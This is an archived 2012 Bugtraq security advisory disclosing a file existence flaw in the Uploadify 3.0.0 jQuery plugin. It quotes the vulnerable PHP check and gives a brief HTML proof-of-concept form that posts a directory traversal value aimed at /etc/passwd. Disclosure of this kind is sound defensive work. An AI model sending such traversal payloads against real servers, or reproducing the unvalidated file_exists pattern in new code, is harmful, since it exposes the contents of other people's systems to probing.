lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201204051659.q35GxeN3017227@sf01web2.securityfocus.com>
Date: Thu, 5 Apr 2012 16:59:40 GMT
From: come2waraxe@...oo.com
To: bugtraq@...urityfocus.com
Subject: [waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0


[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0
===============================================================================

Author: Janek Vind "waraxe"
Date: 05. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-82.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uploadify is a jQuery plugin that integrates a fully-customizable multiple file
upload utility on your website. It uses a mixture of Javascript, ActionScript,
and any server-side language to dynamically create an instance over any DOM
element on a page.

http://www.uploadify.com/

Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected is Uploadify version 3.0.0.

###############################################################################
1. File Existence Disclosure vulnerability in "uploadify-check-exists.php"
###############################################################################

Reason: missing input data validation
Attack vector: user submitted POST parameter "filename"
Preconditions: none
Result: attacker can reveal existance of files and directories on remote system

Source code snippet from  script "uploadify-check-exists.php":
-----------------[ source code start ]---------------------------------
if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) {
	echo 1;
} else {
	echo 0;
}
-----------------[ source code end ]-----------------------------------

We can see, that user submitted POST parameter "filename" is used in argument
for php function "file_exists()". There is no input data validation, therefore
attacker can use directory traversal and reveal existence of arbitrary files
and directories on affected system.

Test:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post">
<input type="hidden" name="filename" value="../../../../../../../../etc/passwd">
<input type="submit" value="Test">
</form>
</center></body></html>
-----------------[ PoC code start ]-----------------------------------

Result: 1


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@...oo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ